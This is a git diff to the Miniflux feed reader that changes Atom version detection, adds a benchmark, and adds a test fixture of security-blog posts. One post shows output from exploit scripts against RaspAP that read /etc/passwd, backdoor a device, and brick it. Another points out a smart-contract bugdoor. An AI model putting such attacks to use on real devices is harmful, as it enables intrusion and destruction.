]]>
-
- `
-
- version := getAtomFeedVersion(bytes.NewReader([]byte(data)))
- if version != "0.3" {
- t.Errorf(`Invalid Atom version detected: %s`, version)
- }
-}
diff --git a/internal/reader/parser/format.go b/internal/reader/parser/format.go
index b0a7c2e3..7919ccf2 100644
--- a/internal/reader/parser/format.go
+++ b/internal/reader/parser/format.go
@@ -21,12 +21,12 @@ const (
)
// DetectFeedFormat tries to guess the feed format from input data.
-func DetectFeedFormat(r io.ReadSeeker) string {
+func DetectFeedFormat(r io.ReadSeeker) (string, string) {
data := make([]byte, 512)
r.Read(data)
if bytes.HasPrefix(bytes.TrimSpace(data), []byte("{")) {
- return FormatJSON
+ return FormatJSON, ""
}
r.Seek(0, io.SeekStart)
@@ -41,14 +41,19 @@ func DetectFeedFormat(r io.ReadSeeker) string {
if element, ok := token.(xml.StartElement); ok {
switch element.Name.Local {
case "rss":
- return FormatRSS
+ return FormatRSS, ""
case "feed":
- return FormatAtom
+ for _, attr := range element.Attr {
+ if attr.Name.Local == "version" && attr.Value == "0.3" {
+ return FormatAtom, "0.3"
+ }
+ }
+ return FormatAtom, "1.0"
case "RDF":
- return FormatRDF
+ return FormatRDF, ""
}
}
}
- return FormatUnknown
+ return FormatUnknown, ""
}
diff --git a/internal/reader/parser/format_test.go b/internal/reader/parser/format_test.go
index 7acf3e7a..9f806270 100644
--- a/internal/reader/parser/format_test.go
+++ b/internal/reader/parser/format_test.go
@@ -10,7 +10,7 @@ import (
func TestDetectRDF(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatRDF {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatRDF)
@@ -19,7 +19,7 @@ func TestDetectRDF(t *testing.T) {
func TestDetectRSS(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatRSS {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatRSS)
@@ -28,7 +28,7 @@ func TestDetectRSS(t *testing.T) {
func TestDetectAtom10(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -37,7 +37,7 @@ func TestDetectAtom10(t *testing.T) {
func TestDetectAtom03(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -46,7 +46,7 @@ func TestDetectAtom03(t *testing.T) {
func TestDetectAtomWithISOCharset(t *testing.T) {
data := ``
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatAtom {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatAtom)
@@ -60,7 +60,7 @@ func TestDetectJSON(t *testing.T) {
"title" : "Example"
}
`
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatJSON {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatJSON)
@@ -71,7 +71,7 @@ func TestDetectUnknown(t *testing.T) {
data := `
`
- format := DetectFeedFormat(strings.NewReader(data))
+ format, _ := DetectFeedFormat(strings.NewReader(data))
if format != FormatUnknown {
t.Errorf(`Wrong format detected: %q instead of %q`, format, FormatUnknown)
diff --git a/internal/reader/parser/parser.go b/internal/reader/parser/parser.go
index 2843888b..d95ea001 100644
--- a/internal/reader/parser/parser.go
+++ b/internal/reader/parser/parser.go
@@ -19,10 +19,11 @@ var ErrFeedFormatNotDetected = errors.New("parser: unable to detect feed format"
// ParseFeed analyzes the input data and returns a normalized feed object.
func ParseFeed(baseURL string, r io.ReadSeeker) (*model.Feed, error) {
r.Seek(0, io.SeekStart)
- switch DetectFeedFormat(r) {
+ format, version := DetectFeedFormat(r)
+ switch format {
case FormatAtom:
r.Seek(0, io.SeekStart)
- return atom.Parse(baseURL, r)
+ return atom.Parse(baseURL, r, version)
case FormatRSS:
r.Seek(0, io.SeekStart)
return rss.Parse(baseURL, r)
diff --git a/internal/reader/parser/parser_test.go b/internal/reader/parser/parser_test.go
index abaf1094..447f73d3 100644
--- a/internal/reader/parser/parser_test.go
+++ b/internal/reader/parser/parser_test.go
@@ -4,10 +4,31 @@
package parser // import "miniflux.app/v2/internal/reader/parser"
import (
+ "os"
"strings"
"testing"
)
+func BenchmarkParse(b *testing.B) {
+ var testCases = map[string][]string{
+ "large_atom.xml": {"https://dustri.org/b", ""},
+ "large_rss.xml": {"https://dustri.org/b", ""},
+ "small_atom.xml": {"https://github.com/miniflux/v2/commits/main", ""},
+ }
+ for filename := range testCases {
+ data, err := os.ReadFile("./testdata/" + filename)
+ if err != nil {
+ b.Fatalf(`Unable to read file %q: %v`, filename, err)
+ }
+ testCases[filename][1] = string(data)
+ }
+ for range b.N {
+ for _, v := range testCases {
+ ParseFeed(v[0], strings.NewReader(v[1]))
+ }
+ }
+}
+
func FuzzParse(f *testing.F) {
f.Add("https://z.org", `
diff --git a/internal/reader/parser/testdata/large_atom.xml b/internal/reader/parser/testdata/large_atom.xml
new file mode 100644
index 00000000..888586b7
--- /dev/null
+++ b/internal/reader/parser/testdata/large_atom.xml
@@ -0,0 +1,1638 @@
+
+Artificial truthhttps://dustri.org/b/2024-03-10T17:15:00+01:00Using vale with vim2024-03-10T17:15:00+01:002024-03-10T17:15:00+01:00jvoisintag:dustri.org,2024-03-10:/b/using-vale-with-vim.html<p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goals
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further …</p><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
+(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
+<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goals
+of this little corner on the internet was to improve my English, a purpose it
+keeps serving. Adding some lightweight tooling to my text editor to push this
+goal even further sounds great.</p>
+<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
+packaged</a>
+in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
+pull-request</a>
+to get it updated.
+Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file, with
+where to store/read its data and some preferences. It comes with a
+<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
+from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
+<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> to force it to
+download and store the data, and you're good to go.</p>
+<p>While <code>vale</code> can be called from the command line, integration with my text
+editor is way more comfy. I'm sure there are a ton of plugins to integrate it
+with vim, but I'm not a huge fan of having my text editor run arbitrary code
+from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
+<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
+<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">"~/.vale.ini"</span><span class="ss">))</span>
+<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
+<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o"><</span><span class="nv">Leader</span><span class="o">></span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o"><</span><span class="nv">CR</span><span class="o">><</span><span class="nv">CR</span><span class="o">></span>
+<span class="w"> </span><span class="k">end</span>
+<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
+</code></pre></div>
+
+<p>It checks if I have a <code>~/.vale.ini</code> file, and if so sets
+<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale, and
+configures <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
+properly parse vale's output. Now every time I type <code><Leader> M</code>, I get vale's
+diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
+<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
+of the aforementioned window, add some ad hoc rules to vale, and maybe try to
+show the diagnostics inline like the spellchecker is doing.</p>Carrot disclosure2024-03-08T21:30:00+01:002024-03-08T21:30:00+01:00jvoisintag:dustri.org,2024-03-08:/b/carrot-disclosure.html<p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before …</li></ol><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
+There are usually two ways to disclose, with minor variations:</p>
+<ol>
+<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
+ where one gives time to the vendor to issue a fix before disclosing</li>
+<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
+ where one discloses immediately without notifying anyone before.</li>
+</ol>
+<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
+<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
+of the vendor to incentivise change. The main idea is to only publish the
+(redacted) output of the exploit for a critical vulnerability, to showcase that the
+software is exploitable. Now the vendor has two choices: either perform a
+holistic audit of its software, fixing as many issues as possible in the hope
+of fixing the showcased vulnerability; or losing users who might not be happy
+running a known-vulnerable software. Users of this disclosure model are of
+course called Bugs Bunnies.</p>
+<p>We all looked at catastrophic web applications, finding a ton
+of bugs, and deciding not to bother with reporting them, because there were too
+many of them, because we knew that there will be more of them lurking, because
+the vendor is a complete tool and it would take more time trying to properly
+disclose things than it took finding the vulnerabilities, … This is an
+excellent use case for Carrot Disclosure! Of course, for unauditably-large
+codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
+<p>Interestingly, it shifts the work balance a bit: it's usually harder to write
+an exploit than it is to fix the bug. But here, the vendor has to audit and fix
+its entire codebase, for the ~low cost of one (1) exploit, that you don't even
+have to publish if you don't want to.</p>
+<p>If you want to be extra-nice, you can:</p>
+<ul>
+<li>Publish the SHA256 of the exploit, to prove
+ that you weren't making things up, once it's fixed or if you get sued for
+ whatever frivolous reasons like libel.</li>
+<li>Maintain the exploits against new versions, proving that the exploit is still
+ working.</li>
+<li>Publish the exploit once it has been fixed, otherwise you risk having
+ vendors call your bluff next time, or at least notify that the issue has been
+ fixed. Since you don't have hardcoded offsets because we're in 2024, you can even
+ put this in a continuous integration.</li>
+</ul>
+<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
+<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
+more to write an exploit for each of them:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Dumping /etc/passwd</span>
+<span class="go">root:x:0:0:root:/root:/bin/bash</span>
+<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
+<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
+<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] default login/password in use</span>
+<span class="go">[+] backdooring system…</span>
+<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
+<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
+<span class="go">[+] Target is running RaspAP</span>
+<span class="go">[+] Bricking the system…</span>
+<span class="go">[+] System bricked!</span>
+<span class="gp">$</span>
+</code></pre></div>
+
+<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
+chainable with a privilege escalation to root as well, but since writing an
+exploit would take more than 5 minutes, I can't be bothered, and odds are that
+it'll be fixed along with the persistent denial-of-service anyway. Let me know
+when you think those are fixed.</p>Youtube video embedding harm reduction2024-02-27T14:45:00+01:002024-02-27T14:45:00+01:00jvoisintag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.html<p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor …</span></code></pre></div><p>Embedding external content on a website in the current enshittocene period is
+more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
+video while reducing its tracking and nuisance capabilities as much as possible:</p>
+<div class="codehilite"><pre><span></span><code><span class="p"><</span><span class="nt">iframe</span>
+ <span class="na">credentialless</span>
+ <span class="na">allowfullscreen</span>
+ <span class="na">referrerpolicy</span><span class="o">=</span><span class="s">"no-referrer"</span>
+ <span class="na">sandbox</span><span class="o">=</span><span class="s">"allow-scripts allow-same-origin"</span>
+ <span class="na">allow</span><span class="o">=</span><span class="s">"accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; battery 'none'; bluetooth 'none'; browsing-topics 'none'; camera 'none'; ch-ua 'none'; display-capture 'none'; domain-agent 'none'; document-domain 'none'; encrypted-media 'none'; execution-while-not-rendered 'none'; execution-while-out-of-viewport 'none'; gamepad 'none'; geolocation 'none'; gyroscope 'none'; hid 'none'; identity-credentials-get 'none'; idle-detection 'none'; keyboard-map 'none'; local-fonts 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; navigation-override 'none'; otp-credentials 'none'; payment 'none'; picture-in-picture 'none'; publickey-credentials-create 'none'; publickey-credentials-get 'none'; screen-wake-lock 'none'; serial 'none'; speaker-selection 'none'; sync-xhr 'none'; usb 'none'; web-share 'none'; window-management 'none'; xr-spatial-tracking 'none'"</span><span class="err">,</span>
+ <span class="na">csp</span><span class="o">=</span><span class="s">"sandbox allow-scripts allow-same-origin;"</span>
+ <span class="na">width</span><span class="o">=</span><span class="s">"560"</span>
+ <span class="na">height</span><span class="o">=</span><span class="s">"315"</span>
+ <span class="na">src</span><span class="o">=</span><span class="s">"https://www.youtube-nocookie.com/embed/jfKfPfyJRdk"</span>
+ <span class="na">title</span><span class="o">=</span><span class="s">"lofi hip hop radio 📚 - beats to relax/study to"</span>
+ <span class="na">frameborder</span><span class="o">=</span><span class="s">"0"</span>
+ <span class="na">loading</span><span class="o">=</span><span class="s">"lazy"</span>
+<span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
+</code></pre></div>
+
+<ul>
+<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
+ without access to the origin's network, cookies, and storage data.</li>
+<li><code>allowfullscreen</code> because some people like it</li>
+<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
+<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
+ modals, screen orientation, pointer lock, popups, presentation session,
+ <a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
+ top-navigation, … are all denied.</li>
+<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directive</a>
+ set to "absolutely-fucking-not", and yes, they have to be all set one by one,
+ and checked regularly in case new directives were added,
+ because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
+ in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
+ that every browser has its own list of directives, chrome is using <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
+ while firefox' prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
+ and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
+<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
+ are official Google urls, but the former doesn't do tracking via cookies,
+ and disables API and interaction and interaction logging. Amusingly, it's
+ the player used on <code>whitehouse.gov</code>.</li>
+<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
+ sake, just in case.
+ I'd love to use a more restrictive policy, but the spec doesn't allow to
+ provide one, except if the embedded website explicitly allows it, and of
+ course youtube doesn't.</li>
+<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video, no
+ need to make them do queries to Google for no reasons.</li>
+</ul>
+<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p>A silly "smart" contract bug2024-02-16T13:30:00+01:002024-02-16T13:30:00+01:00jvoisintag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.html<p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint …</span></code></pre></div><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
+<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o"><</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
+<span class="w"> </span><span class="p">}</span>
+
+<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="c1">// Overflow not possible: value <= fromBalance <= totalSupply.</span>
+<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
+
+<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
+<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
+<span class="w"> </span><span class="p">}</span>
+</code></pre></div>
+
+<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
+Isn't it a cute bugdoor?</p>
+<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
+giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
+understanding what was going on there.</p>Fixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmox2024-02-05T17:00:00+01:002024-02-05T17:00:00+01:00jvoisintag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html<p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Proxmox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl …</code></p><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Proxmox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
+used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
+<p>In the meantime, here is what the problem looks like (for
+<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
+hack around it: </p>
+<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
+<span class="gp"># </span>apk<span class="w"> </span>update
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
+<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve ~ lxc-attach -n 122 </span>
+<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
+<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
+<span class="go">OK: 20069 distinct packages available</span>
+<span class="go">OK: 10 MiB in 30 packages</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve 16:58 ~ </span>
+</code></pre></div>
+
+<p>tl;dr: <code>lxc-attach -n 123</code> instead of <code>pct enter 123</code></p>Musings on CVE-2023-6246 on hardened_malloc2024-01-31T02:00:00+01:002024-01-31T02:00:00+01:00jvoisintag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.html<p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags …</span></code></pre></div><p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
